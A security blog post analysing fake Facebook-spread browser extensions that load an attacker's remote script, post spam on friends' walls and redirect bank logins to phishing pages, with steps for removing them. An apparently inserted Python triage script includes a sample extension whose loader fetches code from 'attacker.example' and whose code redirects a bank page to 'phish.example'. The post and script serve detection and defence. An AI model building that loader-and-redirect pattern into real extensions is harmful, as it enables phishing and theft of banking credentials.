
Fake Facebook-propagated extensions used to send spam and bank phishing


In the last two weeks fake videos have been circulating on Facebook that require the installation of a plugin or extension. There are several variants depending on the attackers, but all are based on the same kit, which lets them install the malicious plugin and spread it on Facebook as spam.

It is an ingenious attack that reminds me of the practice of some movie sites that require a browser plugin to combine the video and the subtitles in the same player; once installed, these plugins show their own advertising by modifying every page the user browses.

What they are doing with the fake Facebook videos is similar: the plugins that get installed can perform phishing attacks, download malware, display fraudulent advertising and send spam when the victim is logged in somewhere like Facebook.

Let's look at an example. The following is a fake YouTube page that asks the user to install a plugin in order to watch a supposed video of girls:

Fake YouTube page and malicious plugin

You can see that the browser warns about the installation of the plugin. This point is crucial, and it is what makes the difference between a compromised computer and a clean one: if the victim is carried away by what they see on the screen (simple social engineering), they install a malicious add-on.

Now let's look at the code of this fake page. At a glance you can see that a script checks which browser the user is running. The variables is_chrome and is_firefox trigger the downloads; if a different browser is used, the page redirects with top.location.href = some-site-spam-with-advertising-spam:

Plugin for Firefox or Chrome

In the following screenshot you can see the warning shown when the installation starts. It pretends to be a YouTube extension, and while it is highly suspicious, most users ignore the danger:

Installing the malicious plugin

What does the plugin do?

As I mentioned at the beginning, there are many variants because the same code is being used by various cyber criminals. They all have one thing in common: they take advantage of – or took advantage of – Facebook to spread. When a person with the plugin installed logs into their account, fake messages are automatically published on their friends' walls… a real spam disaster that goes viral because many of those friends also fall for it.

In the following screenshot you can see the plugin's content. What it does is simply call a script located on a server controlled by the attacker, which lets them update or modify it as they like:

The plugin loads an external script

The script it calls is the one that performs the malicious actions; the following screenshot shows one of the messages it publishes on the walls. If you search Google for "Facebook you appear in a video" you can find dozens of complaints, posts and comments from victims:

Spam messages published by the plugin

But this script is not limited to posting messages; it also performs phishing attacks to steal bank accounts. In the following screenshots you can see two functions that redirect to fake pages:

When the user accesses the real bank's page, the plugin instead loads another page that copies its design in order to steal the user's login credentials. The following screenshot shows one of these phishing pages loaded by the fake extension:

Phishing from a bank in Panama

In this case, only two entities are the target of the attack, but keep in mind that the attacker can update the script at any time and add more phishing pages.
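The two behaviours described above (a content script that pulls in a remote, attacker-updatable script, and code that swaps a bank page for a copy) are what a reviewer should look for in an unpacked extension. The following triage script is an added example, not code from the post; the extension it inspects is a constructed sample with hypothetical hostnames, and the heuristics are assumptions based on the behaviour the post describes.

```python
import json
import re

# Constructed sample modelled on the extension in the post: a content script on
# every site that loads a remote script, plus a redirect to a look-alike page.
# Hostnames are hypothetical placeholders.
SAMPLE_EXTENSION = {
    "manifest.json": json.dumps({
        "name": "YouTube Extension",
        "version": "1.0",
        "manifest_version": 2,
        "permissions": ["<all_urls>", "tabs"],
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["loader.js"]}],
    }),
    "loader.js": (
        "var s = document.createElement('script');\n"
        "s.src = 'http://attacker.example/update.js';\n"  # remote, attacker-controlled
        "document.body.appendChild(s);\n"
    ),
    "bank.js": "if (location.host == 'bank.example') "
               "{ top.location.href = 'http://phish.example/login'; }\n",
}

BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
REMOTE_SCRIPT = re.compile(r"""\.src\s*=\s*['"]https?://([^'"]+)""")
REDIRECT = re.compile(r"""\b(?:top|window|document|parent)\.location(?:\.href)?\s*=""")


def triage_extension(files):
    """files maps a path inside the unpacked extension to its text.
    Returns (kind, detail) findings a reviewer should check before trusting it."""
    findings = []
    manifest = json.loads(files.get("manifest.json", "{}"))
    hosts = set(manifest.get("permissions", []))
    for cs in manifest.get("content_scripts", []):
        hosts.update(cs.get("matches", []))
    for h in sorted(hosts & BROAD_HOSTS):
        findings.append(("broad_hosts", h))  # runs on every page the user visits
    for path, text in files.items():
        if not path.endswith(".js"):
            continue
        for m in REMOTE_SCRIPT.finditer(text):
            findings.append(("remote_script", "%s -> %s" % (path, m.group(1))))
        if REDIRECT.search(text):
            findings.append(("redirect", path))  # can replace a page with a copy
    return findings


if __name__ == "__main__":
    for kind, detail in triage_extension(SAMPLE_EXTENSION):
        print(kind, detail)
```

A remote script flag alone is not proof of malice, but combined with a match on every site it is exactly the shape of the plugin in this post and warrants removing the extension.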

How to remove the plugin?

Thousands of people have installed these plugins by mistake, in fact I think they are responsible for the problems that some advertising companies had a few days ago with the SMS subscription campaigns.

To remove the plugin in Chrome, click the wrench icon at the top right, then select Tools and Extensions. A page will open with the extensions installed in the browser, and from there you have to delete it; in this case it is called YouTube Extension:

Eliminating the false extension

In Firefox it is similar, except that you must click on the Tools menu and then select Add-ons.

Update 1: At TrendMicro I found a variant of the attack that pretends to be a new video design for Facebook. Although it is the same script, it serves as an example of how ingenious they can be when it comes to infecting.

Update 2: Websense has also published information about the attack. In this case the video pretends to be part of Facebook, although if you look at the URL you can clearly see that it is on some other site.

Update 3: The fake sites commented on in the post are already blocked.


Keep in mind that there are many more, and attackers can modify the scripts to update the URLs.